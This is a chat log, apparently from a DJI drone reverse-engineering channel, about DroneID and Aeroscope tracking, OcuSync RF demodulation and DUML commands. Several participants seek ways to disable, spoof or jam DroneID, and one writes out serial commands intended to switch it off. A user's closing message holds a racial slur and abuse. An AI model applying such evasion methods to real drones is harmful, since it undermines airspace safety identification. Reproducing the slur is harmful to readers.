[2020-06-21 15:56:17] jcase : but DJI isnt the outfit designing its

[2020-06-21 15:56:21] jcase : amazon and google have taken the lead

[2020-06-21 15:57:47] pingspike : ahhh right; I see

[2020-06-21 15:57:50] pingspike : [https://www.dji.com/mobile/newsroom/news/dji-demonstrates-direct-drone-to-phone-remote-identification](https://www.dji.com/mobile/newsroom/news/dji-demonstrates-direct-drone-to-phone-remote-identification)

[2020-06-21 15:58:23] pingspike : I thought DJI were just making an app that reveals DJI drone info - I’m with you now

[2020-06-21 15:59:02] jcase : they demoed using an aeroscope to pull the user's email address too

[2020-06-21 15:59:09] jcase : however i dont see that functionality on my AS nor in teh app

[2020-06-21 15:59:16] jcase : i think they demo fake shit sometimes

[2020-06-21 16:25:37] ben_lin : lmao that is straight up dumb

[2020-06-21 16:26:25] ben_lin : and pulling email address... how is that going to be useful for aerial safety? **confused pikachu face**

[2020-06-21 16:36:01] validat0r : They can hook you up with a lawyer maybe.

[2020-07-06 07:01:51] hotelzululima : heh heh & ALL of this assumes that the drone was ordered with valid PII if OPSEC/tradecraft was used then all DJI has is dead ends as far purchaser data goes

[2020-07-06 09:50:26] nopexecutor : fake identity will not help you much if you are caught on place, e.g. based on pilot coordinates broadcasted by the drone :wink:

[2020-07-06 09:52:19] nopexecutor : BTW. I saw in the droneId packet that disabling UUID actually makes this part of message all 0x00. Anyone has any idea how is this UUID generated / if it can be matched to some other data using publicly accessible APIs / etc.?

[2020-07-06 09:53:38] nopexecutor : in the form I saw it it's just 19 bytes ASCII encoded string, with just digits

[2020-07-08 18:45:44] jcase : @takeshi87 yes, it can be matched to individual pilot

[2020-07-12 14:59:52] eitan1195 : using the dji_imah_fwsig to unpack version V01.03.0200_Mavic_dji_system.bin - trying to unpack 0907 module for the modemarm - but the output of the modem is strange.any other way to open it?i used dji_imah_fwsig.py -vv -u -i modemarm_file

[2020-07-23 12:09:17] sergey.muhlynin : Mavic 1 pro, fw 04.0300. Any idea to disable or spoof DroneID identifier (except rollback to 03.0700)? Or changing broadcasted fc serial number (serialnumber char[16])? Patching dji_network binary just disables broadcasting over WiFi connection, not OccuSync.

[2020-07-23 18:20:14] jcase : no legitimate point, still can be picked up

[2020-08-20 03:47:54] hotelzululima : So @jcase what exactly does Aeroscope display for a mp1 running 1,03.0700? since no supposed drone id.. any way for aeroscope to distinguish uniquely between multiple drones all running that release?

[2020-08-20 13:26:49] jcase : probably wave form

[2020-11-16 19:05:39] nopexecutor : just wondering - anybody has any RF recordings from mavic mini 2?

[2020-12-23 09:51:50] rachfly : Do you know if aeroscope can track mavic pro 2 or mavic air 2?

[2020-12-23 10:40:44] the_lord : aeroscope can track any DJI drone using LB, Ocusync, Ocusync 2 or WiFi

[2020-12-23 15:33:03] pingspike : :man-running::skin-tone-3:

[2020-12-24 05:08:45] fallengod : Any way to jam aeroscope to make it useless ?

[2020-12-24 09:10:02] heresmydron : planning to do something nasty? :smile:

[2020-12-24 14:36:13] mingtao : Yes..

[2020-12-24 23:10:46] fredmicrowave : <https://www.youtube.com/watch?v=EdRvaTlKJIA>

[2021-01-21 16:38:25] validat0r : Question: is droneid effectivly disabled by setting Switch (10->03, set 3, id: 218, SubCmd: 5) to 00?

[2021-01-21 22:45:16] nopexecutor : could you please elaborate on that "Switch"? Is it some DUML command to be sent to AC?

[2021-01-22 11:04:13] nopexecutor : do you mean "FlyC Detection" cmd?

[2021-01-22 11:07:04] validat0r : yes

[2021-01-22 11:14:17] validat0r : the .22 app enables the whole array of droneid "aspects" on startup. changing that to "disable all aspects" is easy.

[2021-01-22 11:19:50] nopexecutor : Ah, I didn't realize it's the command behind the GUI of dji app... is value 0 one of those used by app? AFAIR I checked one of those options some time ago, but it didn't disable DroneID transmission on air, just did clear some of its fields

[2021-01-22 11:20:19] validat0r : ofc I cannot be sure whether this completely disables it. I have no gear to test it properly with Mavic Pro

[2021-01-22 11:21:40] validat0r : how did you test? on spark I had the feeling I can test it with kismet .. does Mavic Pro work the same way or does it emit some occu droneid frames?

[2021-01-22 11:22:30] nopexecutor : MA2 + SDR

[2021-01-22 11:23:23] validat0r : ah, ok .. I have a rtl sdr here .. how can I use that to check?

[2021-01-22 11:24:31] validat0r : MA2 should be hard .. AFAIK no open dji go4 for MA2, and no root on the AC

[2021-01-22 11:24:37] nopexecutor : that may be not possible without further HW... rtlsdr runs till ~1700MHz, you need to get to at least 2.4

[2021-01-22 11:25:01] validat0r : ok. then I'm out of luck.

[2021-01-22 11:27:04] validat0r : maybe I should check on kismet, just in case MP sends droneid on WiFi 5MHz-chan as well

[2021-01-22 11:28:25] validat0r : but IIRC it's been said that aeroscope has RF modules for wifi/occu/lb/etc.

[2021-01-22 11:52:10] nopexecutor : still, even if DroneID packet would be gone (not sure though), there are also flight records streaming to RC on the main DL channel. If I saw correctly, on some drones it's encrypted, on some it is not...

[2021-01-22 11:54:57] validat0r : good point.

[2021-01-22 12:03:14] validat0r : one could argue though that receiving droneid beacons is much more robust than decoding the AC/RC channel

[2021-01-22 13:52:01] validat0r : oh cmon .. :smile: I tried to see AC/RC with my SDR, instead I see my SDR in DJI GO signal graph

[2021-01-22 13:52:34] validat0r : i hate rf

[2021-01-22 16:36:44] nopexecutor : xD it's the rtlsdr you mentioned?

[2021-01-22 16:39:00] nopexecutor : that might be right... If I saw correctly there are some additional robustness features in DroneID signal, like alternately sending it from different antennas (at least that is my guessed explanation of the signal behavior)

[2021-01-22 16:39:42] nopexecutor : BTW. I wonder now what DJI will do with EU type certifications of the drones...

[2021-01-22 16:40:11] nopexecutor : one of the requirements for some classes is that the drone ID signal has an open specification :wink:

[2021-01-22 16:42:10] nopexecutor : currently it shares some commonalities with the main DL signal, so opening its specification may attract more attention also in its direction... or maybe if they can/will invite something new and push it via FW updates...

[2021-01-22 16:53:21] validat0r : Probably not on the mp1

[2021-01-22 16:54:54] validat0r : Yeah .. Tuning the rtlsdr to like 1205Mhz gives a spike in dji go spektrum graph at 2410mhz .. Alternating the freq makes the spike in dji go shift, too ..

[2021-01-22 16:55:38] validat0r : I mean, just reading from the rtlsdr, not writing

[2021-01-22 16:56:26] nopexecutor : sure... it's local oscillator must be leaking, with its harmonics...

[2021-01-22 16:57:22] validat0r : With Linux, gqrx

[2021-01-22 16:58:14] validat0r : Yeah, I figured .. Anyway, didn't expect that. The other way around I didn't see anything in the spectrum

[2021-01-25 15:04:45] tmbinc : NopExecutor, you've asked for Mini2 RF records.. I have some, still interested?

[2021-01-25 15:05:37] tmbinc : <https://dji-rev.slack.com/files/U01LD2PMGRE/F01KY7EDE6Q/image.png>

[2021-01-25 15:05:49] tmbinc : (I can share I/Q files if anyone is interested)

[2021-01-25 15:09:46] jcase : I like seeing others share stuff here

[2021-01-25 15:42:44] tmbinc : I guess if someone replays this correctly you would figure out my home address ;)

[2021-01-26 18:45:10] nopexecutor : what a sick samplerate! xD

[2021-01-26 19:13:25] nopexecutor : I love the quality of this signal

[2021-01-26 19:13:45] nopexecutor :

[2021-01-26 20:05:49] nopexecutor : As far as I can tell, at least DL part is very similar to OcuSync2 variant from MA2. It utilizes TBS I haven't observed before, but having found it all the CRCs match. Still, the only unencrypted part I can see there is something that is probably just radio link layer / harq feedback. Could say more if I got the recording from the start.

[2021-01-26 20:06:41] nopexecutor : btw. the duty cycle is quite small compared to what I saw previously... short bursts only...

[2021-01-28 21:58:47] atlantic : Do you have some details about how to demodulate this signal? Symbol duration, cyclic prefix, number of tones and pilot tones, fft size, etc.

[2021-01-29 08:30:48] atlantic : thanx a lot for that 200 MHz sample rate file. Here's a little program to convert big endian to little endian for processing on little endian intel machines.

[2021-01-29 09:17:11] atlantic : and we will not find your home address, as there is no GPS signal in your RC cage (-:

[2021-01-29 09:26:25] peteair : @tmbinc you have a samplerate of 100 Msps or more right ? out of curiosity what's the receiver you used ?

[2021-01-29 09:46:02] nopexecutor : It's described in txt file in archive

[2021-01-29 09:48:48] nopexecutor : Regarding demod - yup, I've got most of that worked out, with final duml / video data extraction (although vid. part still glitchy when packets are lost). Still there are some small mysteries left... LTE PHY 3gpp docs are your friend if you want a starting point

[2021-01-29 09:48:48] peteair : I see :slightly_smiling_face:

[2021-01-29 10:42:43] tmbinc : Very nice work - let me know if you need more/different recordings. I now realize that both symbol rate (~15kHz) and bandwidth options match LTE. Is the sync/training/middle block also similar to LTE? I guess I go read 3GPP TS 36.211 a bit.

[2021-01-29 10:43:23] tmbinc : @pierreduf it's a very hacky setup based on a variety of RF equipment I've ebay'ed/auctioned over the years :)

[2021-01-29 13:01:29] nopexecutor : Nope, there are no PSS/SSS, nor cell specific RS like in LTE DL, there is some simpler solution in place that is actually similar to one of the signals from LTE UL ;) in general there are many similarities to LTE in different layers, but at the same time in almost all layers there are some differences

[2021-01-29 14:14:46] peteair : ahah it does not seem so hacky :slightly_smiling_face: nice setup anyway. As for demod I guess we are and more interested by that :smile:

[2021-01-29 16:44:54] atlantic : @takeshi87 you're not giving it away that easy. Fair enough, I like a puzzle. I assumed OcuSync was some form of wi-fi adapted for long range, but thanks for the hint on LTE. Using auto correlation we found a symbol duration of 66 us. In another reply 15 kHz is mentioned, so that confirm our own finding. I am going to dig into the LTE. I hope we can ask you for another hint if we get stuck on our quest.

[2021-01-29 16:47:42] jcase : to put this out there, if you find a valid attack on OC/OC2, I will most likely be willing to buy it.

[2021-01-29 16:48:00] jcase : and can arrange for permits/attorneys to ensure its legal and safe

[2021-01-29 18:04:41] tmbinc : Need to ask some stupid questions now. At 10MHz nominal BW, LTE uses 601 subcarriers with 15kHz each, so 9.015MHz actual bandwidth. Is that number correct for DJI? I thought I've seen ~9.4MHz OBW, but that was an estimation. Is the symbol rate exactly 15kHz, and carrier spacing exactly 15kHz? I'd then use an FFT, with a size that gives me a frequency resolution of 15kHz, align the sync pilots (so I assume the first symbol has constant pilots and nulls elsewhere?), and then continue with all symbols?

[2021-02-03 18:59:26] atlantic : Is the DroneID signal embedded in the 10 or 20 MHz LTE-like downlink or is it a separate signal?

[2021-02-03 19:08:32] validat0r : Maybe @tmbinc has put the mini without props in his cage and can help here

[2021-02-03 20:02:20] atlantic : Seems obvious to have a separate signal that is easier to acquire for devices like Aeroscope than an OFDM signal. And also to have a better link budget if you have a lower bandwidth signal, to maximize detection range of an Aeroscope like system.

[2021-02-03 20:10:50] atlantic : When I put Mavic Pro in wi-fi mode I see the remote Id stuff in the wi-fi beacon only when I put the motors on. That is also the case with Ocusync?

[2021-02-03 20:15:03] validat0r : i'd like to know that, too :smile:

[2021-02-03 20:15:45] validat0r : nice to have some kind of confirmation that MP1 seems to be behaving like Spark in that respect.

[2021-02-03 20:25:36] nopexecutor : I haven't seen it from MM2 (not there in the sample), but from MA2, M2 and P4Pv2 it was a separate signal, 10MHz

[2021-02-03 20:32:29] atlantic : On the same frequency?

[2021-02-03 20:35:52] atlantic : In the sample from tbminc I saw something 32 us wide, seems like three times something, total 32 us, followed by 8 us silence and then the 1 ms LTE-like frame. This before the LTE frame is not that remote id signal, right?

[2021-02-03 20:41:32] validat0r : tbminc's sample should have been without motors turned on .. so it's not clear if there's droneid in it at all

[2021-02-03 20:59:34] atlantic : It is a sample of 167 ms, I think a drone I'd is send every second, so you need to have a sample of more than a second. I assume it is send every second because seqNum in the remote id is incrementing with the same number a seconds since the last received message.

[2021-02-03 21:07:44] nopexecutor : in MA2 it's enough to connect RC with phone and app connected to trigger DroneID broadcast. It's sometimes in band, sometimes with some offset, but can as well be on totally different freq. It happens every 640ms

[2021-02-03 21:08:49] validat0r : that's occusync ..

[2021-02-03 21:08:54] nopexecutor : yup

[2021-02-03 21:09:01] validat0r : good to know

[2021-02-03 21:10:41] validat0r : if you feel like it you could send a duml to the AC to try to shut it off

[2021-02-03 21:10:54] validat0r : would love to know if that works

[2021-02-03 21:14:58] nopexecutor : any smart, or maybe obvious way to send duml to AC, while having RC+phone connected to it? I have one but it requires using additional phone / tablet and pc... Or you mean directly to AC?

[2021-02-03 21:16:21] atlantic : Thanks @takeshi87, I will try to find it. I have a Mavic Pro.

[2021-02-03 21:16:31] validat0r : yes, direcly .. I have no experience with MA2 .. do you get a serial port if you connect the AC to your PC?

[2021-02-03 21:18:19] validat0r : you should get the dji-firmware-tools off of github. DUMLs can be send via comm_serialtalk.py

[2021-02-03 21:19:02] validat0r : the line to supposedly switch droneid off is like that

[2021-02-03 21:19:05] validat0r : ./comm_serialtalk.py /dev/ttyACM0 -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 0500000000

[2021-02-03 21:20:24] validat0r : if recent dji go 4 versions behave like the one I analyzed, it's switched on on startup, but maybe you can switch it off again.

[2021-02-03 21:40:44] nopexecutor : hm, the DroneID signal is still there. Didn't try to decode it though (it happened just on the edge of BW set on my SDR), but I guess no real change.

[2021-02-03 21:41:56] validat0r : whats the output of this command:

[2021-02-03 21:41:57] validat0r : ./comm_serialtalk.py /dev/ttyACM0 -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 06

[2021-02-03 21:42:36] validat0r : maybe the duml isnt working on MA2 .. 0x06 is GetSwitch. 0x05 is SetSwitch

[2021-02-03 21:54:56] nopexecutor : 55 13 04 03 03 0a 00 00 80 03 da 06 00 5f 00 00 00 62 78

[2021-02-03 21:57:11] validat0r : 5f means enabled

[2021-02-03 21:57:48] validat0r : maybe shut dji go 4 down, use first cmd again, check RF, check 0x06 cmd

[2021-02-03 21:58:34] validat0r : whats the answer duml for the first cmd?

[2021-02-03 22:18:00] nopexecutor : now it is "55 13 04 03 03 0a 00 00 80 03 da 06 00 00 00 00 00 8d 1f", but droneId signal still present

[2021-02-03 22:18:20] validat0r : bummer

[2021-02-03 22:22:31] validat0r : is there any situation when it's not present? like when no GPS, like when no App present, no RC present, directly after startup?

[2021-02-03 22:42:51] tmbinc : But it does look like a regular downlink packet? just at 10MHz?

[2021-02-03 22:43:44] tmbinc : If MM2 does the same then I should have been able to observe it. (Though I don't remember if I actually had the app connected, or just the RC)

[2021-02-03 22:53:55] nopexecutor : similar to regular to regular DL, but the structure differs a little bit. There are cases when I can't see the signal (like right now :/) but it's hard for me to be sure sometimes, if it's gone, or I look in the wrong place - I'm BW limited right now :wink:

[2021-02-03 22:55:47] nopexecutor : argh, it forces me to do SW update in order to be "flyable"... I postponed it for months...

[2021-02-03 22:57:29] validat0r : that can be tricky to get rid of

[2021-02-03 22:57:42] validat0r : without doing the update i mean

[2021-02-03 22:58:35] validat0r : my mini is still on the very first fw ver

[2021-02-03 23:07:54] nopexecutor : hm, after AC restart error is gone and it's again "start allowed", but no SW update happened... whatever ^^

[2021-02-04 09:13:10] atlantic : Tried to find the 10 MHz drone id signal of my Mavic Pro but nothing found yet. I do not have an RF cage, so I see lots of other activity in de 2.4 GHz band. Probably tomorrow some time to take the drone and HackRF to a place in the middle of nowhere where there is no wi-fi, if such a place exists nowadays.

[2021-02-04 13:40:53] atlantic : I've been outside to a place where it was a lot quieter in the 2.4 GHz. Mavic Pro starts up at 2409.5 MHz. We the RC + DJI GO 4 is power on, it switches to a different frequency. I see the downlink and the frequency hopping uplink, but I did not see another signal, 10 MHz wide every 640 ms. Unless it is "hidden" between the regular DL frames.

[2021-02-04 14:37:23] tmbinc : I _think_ I may have captured the DroneID packet.

[2021-02-04 14:38:05] tmbinc : I couldn't close the RF cage and also the phone is in there as well, but this is clearly an OcuSync packet at 10 MHz (the middle one)

[2021-02-04 14:56:17] tmbinc : <https://dropmefiles.com/NnXxL> (note: they are little endian now, otherwise same format)

[2021-02-04 14:56:24] tmbinc : They repeat exactly every 640ms

[2021-02-04 15:47:28] atlantic : @tmbinc you are my hero!

[2021-02-04 15:50:32] validat0r : so, what does it say?

[2021-02-04 15:55:23] atlantic : stupid me, i only checked 2.4 GHz, the beacons are in the 5.8 GHz

[2021-02-04 16:10:41] nopexecutor : yup, that's it

[2021-02-04 16:19:17] tmbinc : SNR is a bit worse on this, I forgot to set the reference level correctly. If it's not sufficient, let me know and I repeat.

[2021-02-04 16:19:47] tmbinc : Not sure if DroneID packets are a.) at a fixed frequency, always, b.) always relative to the downstream, but in the same band, or c.) always in the 5GHz band, but at random frequencies

[2021-02-04 16:28:17] atlantic : i looks like there is a pattern in the middle, if tought someting like that was for sync at the beginning. learning something new every day...

[2021-02-04 16:29:40] tmbinc : The ZC sequences, yeah.

[2021-02-04 16:30:27] tmbinc : @takeshi87 probably has already figured out all of this :) but they appear to be in different places, there's a downlink packet that has two of them in the first 2 symbols, not the usual 0/7/14 (first/middle/last) pattern

[2021-02-07 14:29:26] atlantic : Maybe first some random noise to let the automatic gain control adapt, then ZC for course sync, then symbol ?, then ZC for fine sync and then three symbols with actual data.

[2021-02-19 13:06:24] mats.bohlinsson : I've been browsing in the android code, and saw some calls to setUUID. Is this the same as droneid or is it something else? What is the format on UUID? How do I find out what UUID that is linked to my DJI-account?

[2021-02-19 13:11:24] jcase : its either a standard uuid in ascii

[2021-02-19 13:11:25] jcase : or

[2021-02-19 13:11:32] jcase : package name of the application that sent it

[2021-02-19 13:11:51] jcase : so some apps using the sdk will set it to something like com.foo.whatever

[2021-02-19 13:11:58] jcase : this is only seen in the sdk

[2021-02-19 13:12:27] jcase : you could reverse the api, and get it from dji's server

[2021-02-19 13:12:28] jcase : or

[2021-02-19 13:12:33] jcase : add a log function into the app

[2021-02-19 13:12:36] jcase : and print it to logcat

[2021-02-19 13:12:44] jcase : or several other routes

[2021-02-19 13:13:10] validat0r : ./comm_serialtalk.py /dev/ttyACM0 -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 08

[2021-02-19 13:13:14] validat0r : GetUUID

[2021-02-19 13:14:03] validat0r : wasnt sure how this is connected to anything either

[2021-02-19 13:14:42] validat0r : some 4219...6658 value for my mavic

[2021-02-19 13:15:29] validat0r : first glance reminded me of a GPS position, but probably not the case

[2021-02-19 13:15:35] jcase : that gets it from teh drone

[2021-02-19 13:15:44] jcase : which may not always be the one linked to your account

[2021-02-19 13:15:59] jcase : using stock dji app, that would work

[2021-02-19 13:16:20] jcase : but using some app using the sdk it wont work, nor with some of the modified apks

[2021-02-19 13:29:39] mats.bohlinsson : ok thanks!

[2021-02-20 19:50:21] jordanphinney : Hi guys, have you figured out a way to prevent the AC/RC from broadcasting DroneId beacons?

[2021-03-15 11:49:22] reza.qodsi1362 : i have done some reverse stuff for lightbridge protocol . actually its mimo ofdm . to be precise 1024 point fft. the problem of ofdm and mimo part is done. now i am stuck in interleaving part. the lightbridge protocol is based on wimax .

[2021-03-15 13:49:49] atlantic : you already tried the standard permutation stuff of WiMAX?

[2021-03-15 15:57:27] tmbinc : Is there any similarity between lightbridge and OcuSync?

[2021-03-16 17:20:43] reza.qodsi1362 : its not standard . actually customized. ocusync is customized LTE and Lightbridge customized wimax

[2021-03-23 06:50:09] atlantic : Does somebody already have a I/Q recording of the OcuSync signal of the DJI FPV? Is that OcuSync 3? Any known differences between version 2 and 3?

[2021-03-23 22:32:57] tmbinc : 40MHz channels are new

[2021-03-24 06:37:46] cloudwerx : I have a Mavic Pro Platinum, rooted with custom FC, have been looking into the droneID/Aeroscope stuff and it appears there is a way to spoof your droneID data [https://greyarro.ws/t/anatomy-of-dji-drone-id-implementation-re-aeroscope/10902](https://greyarro.ws/t/anatomy-of-dji-drone-id-implementation-re-aeroscope/10902) , Is there a way to lock this in or just totally disable drone ID from starting up, ever? I should mention I'm on latest FW 01.04.0500, also, does spoofing/breaking droneID screw up anything in terms of flight functionality and is Aeroscope still broadcasting everything when DroneID is disabled? I am using a modified version of the latest nosecneo Android app btw

[2021-03-24 19:05:04] validat0r : you could pack your spoofing stuff into dji go 4

[2021-03-24 19:06:27] validat0r : but afterwards you'd have to check against an aeroscope .. and nobody who has one will help you

[2021-03-24 22:10:24] cloudwerx : Hmm, I would think that, at least Ocusync 1 on the Mavic Pro, before they had thought of all the Aeroscope stuff that the DroneID data is what gets passed off over Ocusync, seems like someone would have found that data by now in the FW or application, also, sounds like DroneID wasn't even introduced until FW 01.03.800. perhaps this is just hopefully thinking, I do have a decent SDR setup, nooelc nesdr smart xtr and ham it up with various antenna, would love to figure out a way to test this, small faraday box, check Ocusync packets/sizes and see what changes when messing with the droneID params

[2021-03-25 12:49:49] validat0r : there are guys here who did the same. tmbinc for one.

[2021-03-26 19:40:48] thepaulkaplan : What samp_rate you want?

[2021-03-26 20:02:26] atlantic : thanks for your reply. if the drone is set to 20 MHz, please sample at 30.72 MS/s, if your equipment can do it.

[2021-03-26 20:05:25] atlantic : and if your equipment allows it, sample with a tuning offset of 10 MHz so the signal is not in the middle where it has a DC spike.

[2021-03-26 20:41:12] thepaulkaplan : Ok, I'll try next morning

[2021-03-26 21:14:24] atlantic : thanks in advance

[2021-03-26 21:17:04] thepaulkaplan : I don't understand about offset so, it's not 10 mhz)

[2021-03-26 21:18:23] thepaulkaplan : or make record in half a band?

[2021-03-26 21:20:15] atlantic : nevermind the offset then. this looks good!

[2021-03-26 21:20:40] atlantic : what sdr do you have?

[2021-03-26 21:20:59] thepaulkaplan : USRP B200mini

[2021-03-26 21:21:57] thepaulkaplan : what is right sample rate to demode mavic signals? :smiley:

[2021-04-05 20:56:26] pingspike : seen this? [https://twitter.com/uavhive/status/1379128018740903936?s=21](https://twitter.com/uavhive/status/1379128018740903936?s=21)

[2021-04-05 20:56:35] pingspike : can anyone confirm this?

[2021-04-05 20:57:15] pingspike : that unlocking a DJI authorization zone sends notifications to law enforcement / aeroscope users?

[2021-04-08 11:51:22] pingspike : anyone?

[2021-04-08 13:35:42] cloudwerx : The FAA is not just an oversight agency but an actual law enforcement agency. When your request to operate in restricted airspace, through DJIs app, you are then essentially requesting for your information to be ran through all their risk assessment tools and passed off to whatever arm off the FAA or other law enforcement agency they see fit to assist. My guess this happens a lot especially to people who are flagged a higher "risk", could be age, criminal record, where you are requesting to fly, religious affiliation.... or anything else. I'm sure post 9/11 those systems are deep and local cops are the quickest way to get eyes on someone.

[2021-04-08 16:09:09] pingspike : this was in the UK

[2021-04-08 16:10:35] cloudwerx : I would think same would apply, only difference is they may not have guns :grin:

[2021-04-08 17:14:31] atlantic : message says: emailed atc for approval. maybe the police got the info from ATC and not from DJI.

[2021-04-08 17:15:57] atlantic : and story does not say wheter Brimingham has an Aeroscope.

[2021-04-08 17:26:24] validat0r : they damn sure dont have a periscope

[2021-04-08 17:36:25] quad808 : I think this is the first time anyone has reported this, but I find it unlikely that DJI notifies law enforcement. They can get all that info from Aeroscope, with access to DJI's user database, track where your flying from via GPS from the app, sent back to DJI and BAM! They show up. Easy test of this would be....apply for an unlock at an airport. Get approval from local authorities AND DJI unlock. Never turn on your drone. See if anyone shows up. Let the unlock expire, then apply for another one. Same location. This time fly the drone. Aeroscope would pick it up, if they have one in operation and if that is the case, they may come calling. Thats my .02 anyway...

[2021-04-09 04:09:12] cloudwerx : Yeah I think once the request is passed off it's then in the hands of whatever agency actually gives approval and then gets ran through their systems. I know this was not in the USA but [https://www.faa.gov/uas/programs_partnerships/data_exchange/](https://www.faa.gov/uas/programs_partnerships/data_exchange/) is what makes these requests so easy here in the States

[2021-04-09 04:55:26] cloudwerx : Aeroscope is only usefull if you are in range of an Ocusync device to detect it, but with newer devices there is likely going to be some much more rubust monitoring shit.

[2021-04-09 05:00:50] cloudwerx : Btw: I can't seem to find it, but I recently found an article that someone wrote who found some new code in either DJI GO or a newer DJI drones FW that mentions "guns", "rifles" or something like that, basically going to enable law enforcement to disable drones remotely and also make it harder to flee the scene if you try. We know DJI is releasing an app soon that detects drones so.. me no likey the big brother stuff. I would pay to disable this shit and I don't even do anything illigal.

[2021-04-12 14:22:49] pingspike : just revisiting this...

[2021-04-12 14:23:20] pingspike : can all AeroScope users see / have access to a list of active DJI GEO unlocks? :thinking_face:

[2021-04-12 15:33:34] steventisseyre : No, they cannot

[2021-04-12 15:41:22] cloudwerx : I would think only within their airspace, but, remoteID will be different. Law enforcement (even forest service) will be able to see everything. DJI is releasing a smart phone app that will basically act like an Aeroscope as well, they have already found code in new DJI devices that mention guns/weapons. That is going to be used for police to be able to drop your drone/freeze it and track anyone fleeing

[2021-04-12 15:41:23] pingspike : based on the screen shot above, how did the police know that someone had requested an unlock in that area? :thinking_face:

[2021-04-12 15:42:06] cloudwerx : Because the FAA or whatever agency operates there sent them

[2021-04-12 15:43:02] cloudwerx : Shit is about to get weird

[2021-04-12 15:45:57] cloudwerx : Thats why people are working on exploiting Aeroscope, with all the new tools coming out it will provide more attack surfaces hopefully someone smarter than me can figure this out. In the USA, flying drones as a hobby is going to be ending soon

[2021-04-12 16:08:47] pingspike : interesting

[2021-04-12 16:09:26] pingspike : so you think the CAA here in the UK are notified by DJI every time someone unlocks a geozone?

[2021-04-12 16:19:00] cloudwerx : DJI does not do anything but pass off the request to the gov agency who actually bapproves the requests

[2021-04-12 16:20:50] cloudwerx : [https://www.faa.gov/uas/programs_partnerships/data_exchange/](https://www.faa.gov/uas/programs_partnerships/data_exchange/) this is the system the FAA uses to fast track requests, so Dji just passes off the request and waits for an approval or denial. Other countries likely have similar systems buy DJI has no influence at all over the requests

[2021-04-12 16:21:18] cloudwerx : but*" sorry typing with my feet

[2021-04-12 18:00:09] dkovar : Wait. There is NFZ approvals, which is handled by DJI, and LAANC approvals, which are handled by various service providers. The post was about NFZ unlocks. That would not be handled by the FAA, CAA, etc.

[2021-04-12 19:31:17] pingspike : strange…

[2021-04-12 19:31:39] pingspike : maybe that facebook post was just bullshit :man-shrugging::skin-tone-2:

[2021-04-12 19:31:56] pingspike : I came across the FB screen shot on twitter

[2021-04-12 19:32:01] validat0r : bullshit on fb? heaven, no

[2021-04-12 19:32:04] pingspike : I’m not on FB so can’t look it up

[2021-04-12 19:32:17] pingspike : seems a strange thing to make up

[2021-04-12 19:33:25] pingspike : maybe the cops just got the details from ATC when he requested permission to fly there

[2021-04-12 19:33:35] pingspike : and not from aeroscope at all

[2021-04-12 19:51:40] dkovar : I don't think it was made up, I think some details were a bit fuzzy. What I suspect happened is: 1. The operator unlocked the NFZ 2. The operator contacted ATC to let them know he was flying. He probably told ATC "I've already unlocked the NFZ" 3. An Aeroscope unit detected the flight. 4. LE called ATC and asked "Do you know about this?" 5. ATC said "Yes, he contacted us, he also unlocked the NFZ" 6. LE contacted the operator. They have his serial number from AS and the fact that he unlocked the NFZ from ATC, verbally.

[2021-04-12 20:02:35] pingspike : thanks @dkovar - makes perfect sense

[2021-04-12 20:03:17] pingspike : I think my concern/fear was that every time someone unlocks a DJI GEO zone, that DJI are then sharing that information with various third parties (law enforcement, CAA/FAA, etc)

[2021-04-12 20:13:35] dkovar : DJI has a vested interest in not automatically sending information to LE, if they could even figure out what agency to send it to. And, LE generally wants to ask for information, or get it through something official, like Remote ID. DJI will respond to a warrant, but they're not automatically sharing information. It -is- very valuable information, that is certain.

[2021-04-12 20:15:20] pingspike : what ever happened to this?

[2021-04-12 20:15:22] pingspike : <https://www.dji.com/newsroom/news/dji-demonstrates-direct-drone-to-phone-remote-identification>

[2021-04-12 20:15:29] pingspike : November 2019 :man-shrugging::skin-tone-2:

[2021-04-12 20:15:54] pingspike : Remote ID for Joe Public, right?

[2021-04-12 20:16:22] pingspike : all gone quiet since then

[2021-04-12 20:16:29] pingspike : (thankfully)

[2021-04-12 20:36:17] dkovar : Once the U.S. Government figures out Remote ID then DJI can quickly support it. They did the demo in an effort to get their version considered as an official solution.

[2021-04-13 06:51:26] eitan1195 : do the mavic mini / mavic mini 2 run android?

[2021-04-13 21:46:20] chipmangini : @eitan1195 I would ask in a more appropriate forum, like ~spoon-feeding

[2021-04-16 16:53:30] pingspike : did DJIs drone id smartphone app ever become anything more than a press release? the app that anyone can download to ID any drone and operator

[2021-04-16 16:53:43] pingspike : anyone ever see a working demo of it?

[2021-04-16 17:49:47] atlantic : Not me. But I guess for their wi-fi based drones, you should be able to pick up the beacons if you put your wi-fi interface into monitoring mode.

[2021-04-20 10:14:52] jcase : @eitan1195 I would not consider it android no, it does use some android bits

[2021-04-20 10:30:32] djibot.5150 : Would it be possible to make xposed like framework since its uses android bits?

[2021-04-20 10:31:45] djibot.5150 : To run on the drone*

[2021-04-20 11:32:46] mefisto : You can create any framework, on any device. The question is - what problem do you want to solve? Xposed provided unified interface to more device functions, fixing the issue of multiple stand-alone mods wanting to hook to specific places, and those places being different between platforms. Where are the stand-alone mods for Mini which conflict each other and have compatibility issues? Also, how is any of that related to droneid?

[2021-04-20 11:38:39] validat0r : valid questions.

[2021-04-20 11:47:13] djibot.5150 : It was , sorry. Not sure I can write why here.

[2021-04-20 13:24:27] mefisto : Your keyboard does ninja dodges when you try? We don't have any hard frames for moderation. We don't discuss crimes, but that's pretty much it in regard to rules.

[2021-04-20 15:19:38] djibot.5150 : I wasn't aware it was a crime

[2021-04-20 15:20:53] djibot.5150 : Since when is a Mac change a crime? Since when is using a VPN a crime?

[2021-04-20 15:27:29] djibot.5150 : Anyway I'm out, your whole dji secretive shit is pretty gay. Why are you hiding from dji? This was supposed to be a place to learn but "not in public" doesn't help anyone. Anyway I'm a nigger with a keyboard, not a ninja dodging anything. You all are the ones dodging. You all are so much help I tried to upload firmware for DDD and binary turns it into a huge word game, I'm pretty much denied learning how to upload a bin for you all so fuck it... Bye

[2021-04-20 16:33:32] validat0r : Word

